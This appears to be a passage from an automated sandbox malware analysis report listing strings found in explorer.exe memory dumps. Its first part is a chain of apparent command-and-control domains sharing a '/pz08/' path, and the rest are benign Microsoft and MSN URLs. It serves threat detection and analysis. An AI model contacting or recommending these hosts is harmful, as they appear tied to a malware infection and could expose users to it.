Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kxn.ink
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kxn.ink/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kxn.ink/pz08/www.nordens-media.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kxn.inkReferer:
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nordens-media.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nordens-media.com/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nordens-media.com/pz08/www.thewipglobal.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nordens-media.comReferer:
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.phdop.xyz
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.phdop.xyz/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.phdop.xyz/pz08/www.rdlva.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.phdop.xyzReferer:
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.plantasdasminas.com
Source: explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.plantasdasminas.com/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.plantasdasminas.comReferer:
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rdlva.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rdlva.com/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rdlva.com/pz08/www.yassa-hany.online
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rdlva.comReferer:
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sunriseclohting.store
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sunriseclohting.store/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sunriseclohting.store/pz08/www.plantasdasminas.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sunriseclohting.storeReferer:
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tacoshack479.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tacoshack479.com/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tacoshack479.com/pz08/www.sunriseclohting.store
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tacoshack479.comReferer:
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thewipglobal.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thewipglobal.com/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thewipglobal.com/pz08/www.boostyourselftoday.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thewipglobal.comReferer:
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tobegoodlife.net
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tobegoodlife.net/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tobegoodlife.net/pz08/www.5819995.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tobegoodlife.netReferer:
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yassa-hany.online
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yassa-hany.online/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yassa-hany.online/pz08/www.go-bloggers.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yassa-hany.onlineReferer:
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yobo-by.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yobo-by.com/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yobo-by.com/pz08/www.phdop.xyz
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yobo-by.comReferer:
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ytytyt016.xyz
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ytytyt016.xyz/pz08/
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ytytyt016.xyz/pz08/www.aloyoga-uae.com
Source: explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ytytyt016.xyzReferer:
Source: explorer.exe, 00000007.00000000.1404737205.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3797149522.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000007.00000003.2272035015.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1404737205.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3074160405.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3798409790.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000007.00000002.3797149522.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000000.1404737205.0000000008DA6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000000.1404737205.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3797149522.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000002.3793412922.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1400763219.0000000007276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 00000007.00000000.1404737205.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3797149522.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000007.00000002.3805456572.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1408522157.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000007.00000002.3805456572.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1408522157.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000007.00000002.3805456572.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1408522157.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000000.1404737205.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2272035015.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000007.00000002.3805456572.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1408522157.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
